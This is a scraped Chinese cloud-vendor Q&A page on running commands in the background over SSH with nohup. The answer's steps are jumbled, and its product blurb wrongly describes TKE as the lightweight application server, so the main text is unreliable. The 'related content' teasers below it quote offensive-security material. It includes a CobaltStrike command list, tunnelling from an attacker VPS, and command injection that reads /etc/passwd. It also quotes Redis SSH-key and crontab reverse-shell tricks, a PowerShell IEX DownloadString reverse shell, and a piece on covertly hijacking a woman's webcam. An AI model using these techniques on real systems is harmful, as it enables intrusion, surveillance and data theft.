首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

获取ssh以在目标计算机上的后台执行命令

您好!您的问题是关于如何在目标计算机上后台执行命令。这里,我们将使用SSH(Secure Shell)协议来实现这个目标。

SSH是一种加密的网络协议,用于在不安全的网络环境中安全地访问和管理远程计算机。SSH允许用户在本地计算机上运行命令,并在远程计算机上执行这些命令。这对于系统管理员和开发人员来说非常有用,因为它们可以在不登录到远程计算机的情况下管理和维护远程计算机。

要在目标计算机上后台执行命令,您可以使用以下步骤:

  1. 打开终端(在Linux或MacOS上)或命令提示符(在Windows上)。ssh 用户名@目标计算机IP地址例如:ssh john@example.comnohup 命令 &例如:nohup python myscript.py &这将在后台执行myscript.py脚本。
  2. 使用SSH命令连接到目标计算机。命令格式如下:
  3. 在SSH会话中,使用nohup命令在后台执行命令。nohup命令允许您在终端关闭后继续运行命令。命令格式如下:
  4. 要查看后台命令的输出,您可以使用以下命令:cat nohup.out这将显示nohup.out文件的内容,该文件包含在后台执行的命令的输出。

请注意,这些步骤仅适用于Linux和MacOS。在Windows上,您可以使用PuTTY或其他SSH客户端来执行类似的操作。

推荐的腾讯云相关产品:

  • 腾讯云虚拟私有云:腾讯云虚拟私有云(VPC)是一种逻辑隔离的私有网络空间,为用户提供了一个安全、可控的网络环境。
  • 腾讯云轻量应用服务器:腾讯云轻量应用服务器(TKE)是一种基于Kubernetes的容器管理服务,可以帮助用户快速、高效地部署和管理应用程序。
  • 腾讯云云服务器:腾讯云云服务器(CVM)是一种基于虚拟化技术的计算服务,可以帮助用户快速、高效地部署和管理应用程序。

这些产品都可以与SSH协议一起使用,以实现在目标计算机上后台执行命令的目的。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

渗透测试神器CobaltStrike使用教程

目标上执行程序(无输出)    execute-assembly          目标上内存中执行本地.NET程序    exit                      退出beacon    ...特定进程中生成会话    jobkill                   杀死一个后台任务    jobs                      列出后台任务    kerberos_ccache_use...使用服务机上生成会话    psexec_psh                使用PowerShell机上生成会话    psinject                  特定进程中执行...PID下生成会话    ssh                       使用ssh连接远程主机    ssh-key                   使用密钥连接远程主机    steal_token...   wmi                       使用WMI机上生成会话 复制 (4)其他: 这里仅仅介绍了CobaltStrike工具一小部分功能,CobaltStrike是一款非常强大远控工具

3.2K20

一次渗透妹子电脑开摄像头全过程

目标上列出驱动器 elevate                          升高上下文中生成一个会话 execute                          目标机上执行程序(...无输出) executeassembly                  目标机上执行本地.NET程序。...run                              目标机上执行程序(返回输出) runas                            以其他用户身份执行程序 runasadmin...ssh                              使用SSH机上生成一个SSH会话。...sshkey                           使用SSH机上生成一个SSH会话。

2.1K10

ansible简易入门

这个工具目标有这么几项:让我们自动化部署APP;自动化管理配置项;自动化持续交付;自动化(AWS)云服务管理。 所有的这几个目标本质上来说都是一个台或者几台服务器上,执行一系列命令而已。...——批量远程服务器上执行命令 。 Ansible提供了一套简单流程,你要按照它流程来做,就能轻松完成任务。这就像是库和框架关系一样。 Ansible是基于 paramiko 开发。...它是一个纯Python实现ssh协议库。因此fabric和ansible还有一个共同点就是不需要在远程主机上安装client/agents,因为它们是基于ssh来和远程主机通讯。...管理主机上输入以下命令 ssh-keygen -f $HOME/.ssh/id_rsa -t rsa -N '' # 生成本地ssh登录密钥 ssh-add $HOME/.ssh/id_rsa ssh-copy-id...# 后台执行长时间任务,其中 -B 1800 表示最多运行30分钟, -P 60 表示每隔60秒获取一次状态信息. ansible all -B 1800 -P 60 -a "/usr/bin/long_running_operation

2.3K60

利用SSH隧道技术穿越内网访问远程设备

1. ssh 端口转发模式简介 ssh 客户端运行于本地机器,它作用是:登录到目标机器并在目标机器上执行命令。它可以建立一个安全通道,为不安全网络上两个不受信任主机提供安全加密通信。...---- -f 请求 ssh 执行命令之前转到后台。如果用户希望 ssh后台运行,但 ssh 需要用户提供密码或口令,使用 -f 选项就很有用,在用户输入密码之后,ssh 就会转入后台运行。...目标机上执行任意基于屏幕程序时(例如,实现菜单服务),分配伪终端很有用。使用多个 -t 选项则会强制分配终端,即使 ssh 没有本地终端。 ---- -T 禁止分配伪终端。...bind_address 值为空或 “*” 时,表示目标机上监听套接字会监听目标机上所有网络接口。...目标机:把待调试目标机器称作目标机 T(Target)。目标机通常是待调试设备,处于局域网内,外网无法直接访问内网中设备。 本地机:把调试用本地计算机称作本地机 L(Local)。

2.1K30

docker运行容器外命令及系统监控思路

这里docker为例,如果我想在docker容器内部想要获取或者执行相关宿主机上命令。相信很多devops团队同学对这个应该比较熟悉。比如可以让用户查看当前系统cpu使用情况。...这个操作java服务jar包形式直接部署形式获取这些数据是比较简单。可以直接使用相关三方开源库或者代码中调用linux命令就行。...docker容器中生成私钥与公钥,然后将公钥保存在宿主机 ~/.ssh/authorized_keys 这样宿主机就可以通过ssh宿主机上执行命令了。...下面部署docker容器上java应用获取磁盘使用情况为例【前提是docker上已经配置好了ssh免密】 /** * 系统基础信息 * * @author baiyan */ @ApiModel...这还只是计算一个硬盘使用率,如果一个请求中需要获取到更多宿主机上内容的话,串行化,接口肯定会很卡。 因此这里可以定义一个定时任务去异步执行获取数据任务,比如每隔30秒左右执行命令将数据进行落表。

1.2K10

内网渗透测试:隐藏通讯隧道技术

SSH 命令 ssh 用户名@ip -p 创建ssh隧道常用参数有: -C:压缩传输,提高传输速度 -f:将ssh传输转入后台执行,不占用当前shell -N:静默连接,连接后看不到具体会话...攻击者vps上面执行: ssh -CfNg -L 1153(vps端口) : 192.168.52.138(目标机ip) : 3389(目标端口) root@192.168.1.103(跳板机) //...socks代理相应采用socks协议代理服务器就是SOCKS服务器,是一种通用代理服务器。利用SOCKS能够与目标内网计算机进行通信,避免多次使用端口转发。...说明连接成功: 现在就可以攻击者计算机上面配置proxychains或SocksCap64等工具通过访问公网vps(39.xxx.xxx.210)1080端口来使用内网web服务器上面架设socks4...我们先将ew上传至B主机上面,并用ssocksd方式启动1234端口正向socks代理: ew_for_Win.exe -s ssocksd -l 1234 接着,将ew上传至A主机中,并执行命令

2.1K40

打靶系列之- DC-4

01 项目安装 首先咱们需要将DC-4靶机下载,并安装到咱们机上 下载地址是:https://www.five86.com/dc-4.html ?...可以看到页面确实在往后台传递命令,那么这里存在命令注入漏洞 将 ls+-l 修改为 cat+/etc/passwd ,获取下服务器密码 ? 可以看到直接获取了服务器用户名 ?...攻击机上已经获取到了shell #获取完全交互shellpython -c 'import pty;pty.spawn("/bin/sh")' 链接上靶机之后,看下服务器上面都有什么,最后发现只有jim...登录成功 06 获取信息 服务器中,可以看到Charles发送给Jim一份邮件 var/mail文件夹下 ?...提权成功 最后查看root目录下目标 ? 08 总结 1. 使用BurpSuite对网页登录框,进行密码账号爆破 2. 通过命令注入漏洞,进行命令注入 3. 使用hydra对ssh进行爆破 4.

76730

每天学一个 Linux 命令(59):ssh

命令简介 ssh ( Secure Shell )命令是用于安全登录到远程系统协议,它可用于远程服务器上记录或执行命令。...sshSSH 客户端)是用于登录到远程计算机并在远程计算机上执行命令程序。可以不安全网络中于两个不受信任主机之间提供安全加密通信。...-A #启用来自身份验证代理连接转发 -a #禁用身份验证代理连接转发 -B bind_interface #绑定到地址 bind_interface尝试连接到目标主机之前 -b bind_address...#使用 bind_address本地计算机上作为连接源地址 -C #请求压缩所有数据 -c cipher_spec #指定用于加密会话密码规范 -D [bind_address:] 端口...') -F 配置文件 #指定每用户ssh配置文件 -f #配置ssh执行命令之前将请求转到后台 -g #允许远程主机连接到本地转发端口 -i identity_file #指定从这个文件中去读取用于公共密钥身份验证标识

95510

【系统和网络软件】51component为您带来适用于Windows系统和网络软件——MobaXterm与MobaSSH

Mobatek产品设计遵循以下主要原则: 直观图形用户界面 没有间谍软件/广告软件,没有不需要互联网连接 敏捷开发实现快速功能实施和安全修复 先试后买:软件可以购买前进行测试 稳定、轻便...服务器、选项卡式SSH客户端、网络工具等增强型Windows终端MobaXterm X服务器和SSH客户端01、用于远程计算MobaXterm 是您用于远程计算终极工具箱。...04、直观用户界面开发MobaXterm时,Mobatek专注于一个简单目标:提出直观用户界面,以便您通过不同网络或系统有效地访问远程服务器。...主要特征01、适用于Windows远程脚本远程Windows计算机上执行命令02、安全地共享您文件通过加密SSH通道传输文件03、远程监控检索有关远程计算信息04、远程软件部署远程Windows...计算机上静默安装软件05、远程管理静默管理远程Windows计算机。

97450

实战记录 | 自主搭建三层网络域渗透靶场

'=00' for i in sys.stdin.read()]).upper())" 重复上述利用步骤后,成功写入webshell并连接成功: image-20210225132343007 我们使用蚁剑执行命令时发现目标主机主机名有点显眼...下面我们需要docker逃逸来获取目标主机(docker宿主机)权限。但此时我们所获得是www-data用户权限,权限比较低,干不成什么大事,所以要想办法提升一下权限。...Docker 18.09.2之前版本中使用runc版本小于1.0-rc6,其允许攻击者重写宿主机上runc 二进制文件,攻击者可以宿主机上root身份执行命令。...当控制使用特权模式启动容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机文件读写权限,此外还可以通过写入计划任务等方式宿主机执行命令。...首先攻击机上执行如下命令添加一个转接隧道,监听1090端口,并将1090端口收到代理请求发送给1235端口,执行命令: .

4.4K40

反弹shell学习总结 - Part 1

192.168.63.130:6379>flushall 查看所有键: 192.168.63.130:6379>KEYS * 获取默认redis目录、和rdb文件名:可以修改前先获取,然后走时候再恢复....利用计划任务执行命令反弹shell redisroot权限运行时可以写crontab来执行命令反弹shell 先在自己服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@...1.4 Redis其他应用 如果Redisroot身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。...一旦攻击者可以一台计算机上运行代码,他们便可以下载powershell脚本文件(.ps1)到磁盘执行,脚本可以在内存中运行(无文件化)。...hash值 ...... 2.2.1 基于TCPPowershell交互式shell 目标机上执行如下代码: powershell IEX (New-Object Net.WebClient).DownloadString

86421

Redis未授权访问漏洞利用总结

kaili上测试: ? 不需校验直接就可以连接redis,存在Redis未授权访问漏洞。 备注: 测试时候如果出现redis客户端一直连不上情况,机上执行了以下命令,客户端就可以连接上了。...漏洞利用 利用姿势1,redis写入ssh公钥,获取操作系统权限 原理:利用了redis数据库备份功能,当redisroot身份运行,利用Redisconfig set命令,只要内容为SSH公钥内容...,文件路径满足公钥存放位置,就可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器。...至此成功写入ssh公钥到靶机。 然后攻击机上使用ssh免密登录靶机: ssh -i id_rsa root@10.1.8.158 ?...利用姿势3,linux计划任务执行命令反弹shell: 原理: 首先同样利用了redis数据库备份功能,我们不知道网站绝对路径时候,可以利用linux定时任务特性:Linux会监测/etc

7.9K31

SSH端口转发

本地转发 第一种场景 A: 10.0.0.1 B: 10.0.0.2 (安装Mysql service,监听端口3306) B 上数据库 限制了 只有本机上应用才可以直接连接Mysql 服务,...:10.0.0.2:80 root@10.0.0.2 * -L 表示 使用 本地转发 建立ssh隧道 * 选用 -f 后台建立隧道 * -N 建议隧道后不执行命令 * -fNR * 本地转发...: 本地转发是 表示本地端口上数据通讯都会被转发到目标主机对应端口上,这里可以抽象成是一种映射,执行命令主机 为 本地主机。...本地服务器 10.0.0.1 B: 中间服务器 10.0.0.2 C: 目标服务器 192.168.0.2 A——能访问——>B——能访问——>C A——不能访问————> C A 通过该本地端口 B...这个只是端口转发时候使用,其他不会请求 让该进程在后台运行 ssh -D 30002 -l username proxy.remotehost.com -Nf 给ssh 增加http代理 某些场景下

3.6K50

Ansible 简介

Ansible 主要功能 管理员可以通过 Ansible 成百上千台计算机上同时执行指令(任务)。...Ansible 工作方式 使用 Ansible 无须在被管理客户端电脑上安装代理之类组件。它通过普通 SSH 进行通信,以便从远程计算机检索信息、发出命令和复制文件。...配置客户端主机 SSH 秘钥 对于自动化来说,最后是通过秘钥进行认证,这样就不会把用户密码明文方式写在脚本里。...testservers -u nick -a "df -h" 从输出结果可以看出 df -h 命令两台目标机上都执行了。...如果你不是通过 ssh-copy-id 命令把公钥添加到目标机器上(多数环境都不是这么做),首次执行 ansible 命令时需要用户确认连接安全性: 这是非常悲催,因为我们要实现目标是自动化执行命令

71320

如何在Linux系统中使用SCP命令传输文件和文件夹?

Linux系统中,SCP(Secure Copy)是一种用于本地和远程主机之间安全传输文件和文件夹命令行工具。它基于SSH协议,并提供了加密和身份验证机制,确保数据安全性和完整性。...目标路径:传输目标路径,可以是本地路径或远程主机上路径。2..../www/html执行命令时,系统会要求输入远程主机密码进行身份验证。...使用不同端口和身份验证方式如果远程主机上SSH服务器使用非标准端口,可以使用-P选项指定端口号。...定期更新和升级您Linux系统,获取最新安全补丁和修复程序。遵循这些安全最佳实践可以帮助确保SCP传输过程中数据安全性和系统安全性。8.

10.3K51

细说渗透江湖之长路漫漫

进入后台 通过枚举出用户名开始对各个系统进行爆破。 漫长等待后,一个叫XX物业系统管理后台被爆破成功,看这画风应该是一个点餐系统。 ?...我们通过对代码审计,Update()函数发现了一点蛛丝马迹,此函数658行会先从用户处获取一个filepath,然后665行拼接成完整文件下载路径,可以看到数据都是通过frparam()这个功能接收...这里直接用proxychains去连接redis,然后.ssh文件里写入密钥。 ? 成功获取root权限。 ?...横向扩展 拿到服务器权限后,通过查看history历史命令,我们获取到一个使用目标企业相关单词+@2020密码,果然使用这种规则密码公司挺多,记得以前公司也是这样设置。 ?...redis,又通过其 history获取密码扩展了几台主机,最终配合几台主机上bash脚本获取到本段大部分主机权限。

62920

【Hvv】攻防演练中蓝队主要工具

口令爆破工具 蓝队主要利用口令爆破工具来完成对目标网络认证接口用户名和口令穷尽破解,实现对目标网站后台、数据库、服务器、个人终端、邮箱等目标的渗透控制。...Medusa 是 Kali Linux 系统下对登录服务进行暴力破解工具,基于多线程并行可同时对多个主机、服务器进行用户名或密码强力爆破,尝试获取远程验证服务访问权限。...WebLogic 全版本漏洞利用工具该漏洞利用工具集成 WebLogic 组件各版本多个漏洞自动化检测和利用功能,可对各版本 WebLogic 漏洞进行自动化检测和利用,根据检测结果进行执行命令等针对性利用并获取服务器控制权限...它具有强大检测引擎,集成众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及操作系统上内连接执行命令,同时内置了很多绕过插件,支持数据库有 MySQL、Oracle、PostgreSQL...远程控制工具 蓝队主要利用远程控制工具对目标网络内服务器、个人计算机或安全设备进行管理控制。

2.3K50

记一次内网渗透(二)

image-20200726201743954 如上图,成功到了目标的shell,原理就是目标机上传了一个pwn.jsp。...利用CVE-2019-5736逃逸 Docker 18.09.2之前版本中使用runc版本小于1.0-rc6,因此允许攻击者重写宿主机上runc 二进制文件,攻击者可以宿主机上root身份执行命令...当控制使用特权模式启动容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机文件读写权限,此外还可以通过写入计划任务等方式宿主机执行命令。...我们看到靶场描述中有一个“ssh密钥利用”,猜测是利用docker特权模式来宿主机硬盘中写入ssh私钥,实现ssh免密登录宿主机,从而实现对目标宿主机控制。...目标机上传mimikatz,抓一下Windows 7密码: ?

1.6K30

SSH隧道详解与使用AutoSSH实现稳定内网穿透

(仅限协议第二版) -f 要求 ssh 执行命令前退至后台. 它用于当 ssh 准备询问口令或密语, 但是用户希望它在后台进行. 该选项隐含了 -n 选项....本地转发 1.功能解释 本地转发即在A服务器执行ssh命令登录B服务器来启用SSH隧道,实现通过访问A服务器转发端口,达到实际访问为B服务器目标端口目的。如下图所示: 2....功能解释 上面我们知道了本地转发是A服务器执行ssh命令后将转发端口设置A服务器本身,远程转发则相反,是将转发端口设置ssh命令目标服务器上。...远程转发即在B服务器执行ssh命令登录A服务器来启用SSH隧道,实现通过访问A服务器转发端口,达到实际访问为B服务器目标端口目的。如下图所示: 2....将此项配置为yes并重启SSH服务后,再次执行命令 ssh -f -N -R A主机转发端口:B主机IP:B目的端口 root@A主机 这时远程转发转发端口会设置A主机所有网卡上,即0.0.0.0

3.3K50
领券